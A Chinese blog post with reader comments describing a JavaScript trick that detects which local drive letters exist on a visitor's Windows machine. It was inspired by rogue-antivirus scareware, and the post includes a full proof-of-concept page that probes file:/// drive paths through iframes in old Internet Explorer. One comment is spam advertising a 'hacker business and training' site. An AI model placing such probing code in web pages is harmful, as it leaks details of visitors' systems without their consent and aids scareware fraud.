JS查看本地盘符是否存在

昨天看到篇文章,极其猥琐。

《恶意代码JS.SecurityToolFraud诱使用户下载安装流氓安全软件》

http://www.symantec.com/connect/node/1147541

重要是猥琐,其中有个图,显示用户的每个磁盘有多少病毒:

securitytoolfraud_2_article%20thumbnail.jpg

这个图需要得到用户盘符有多少,和KJ讨论了半天。

他说06年时,有老外发了个img加载文件时间,判断文件是否存在的猥琐方式。

不过我没找到这个代码,所以研究下,也搞了一种方式:

  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 
  2. <HTML> 
  3.  <HEAD> 
  4.   <TITLE> New Document </TITLE> 
  5.   <META NAME="Generator" CONTENT="EditPlus"> 
  6.   <META NAME="Author" CONTENT=""> 
  7.   <META NAME="Keywords" CONTENT=""> 
  8.   <META NAME="Description" CONTENT=""> 
  9.  </HEAD> 
  10.   
  11.  <BODY> 
  12. <iframe id="c" src="file:///c:/"></iframe> 
  13. <iframe id="d" src="file:///d:/"></iframe> 
  14. <iframe id="e" src="file:///e:/"></iframe> 
  15. <iframe id="f" src="file:///f:/"></iframe> 
  16. <iframe id="w" src="file:///w:/"></iframe> 
  17. <div id="div"> 
  18. 哥找到了查看本地磁盘是否存在的方式,暂时只支持ie</br> 
  19. </div> 
  20. <script>  
  21.   
  22.   
  23. list = ["c","d","e","f","w"]; 
  24.   
  25. for(i=0;i<list.length;i++) 
  26.     try{ 
  27.     document.getElementById("div").innerHTML+=window.frames[list[i]].document.title+list[i]+"盘存在</br>"; 
  28.   
  29.     }catch(qqq){ 
  30.         document.getElementById("div").innerHTML+=list[i]+"盘不存在</br>"; 
  31.     } 
  32. </script> 
  33.   
  34.   
  35. </BODY> 
  36. </HTML> 

在这里记录下,目前只支持IE。

http://www.inbreak.net/kxlzxtest/testlocalpath/1.html

发表评论?

12 条评论。

  1. 用 img 标签,使用 onerror 事件,应该也可以检查(未测试)

  2. 回woyigui。
    onerror只要文件不在就错误,所以要指定一个“只要有这个盘,必定存在的文件”。想来麻烦,所以没测试。

  3. 回hi_heige。
    哈哈!这个方式原理一样,都是靠异常判断,它那里如果盘不在,就不能加入result。
    这个站很有意思。

  4. 好东西。收藏了先~~~

  5. ███████国内最强的黑客业务和培训站点███████
    http://WWW.5942HK.CN

  6. 哇,好犀利,用iFrame来解决啊
    学习了~

  7. IE8 下无爱,已测试

  8. 很好的创意啊,学习了!!!

  9. 用你这个方法试了下判断任意目录,结果不行。。。。

  10. RES 和 file 协议功能!!!!

  11. 嗯,不错的东西,收藏一下!

发表评论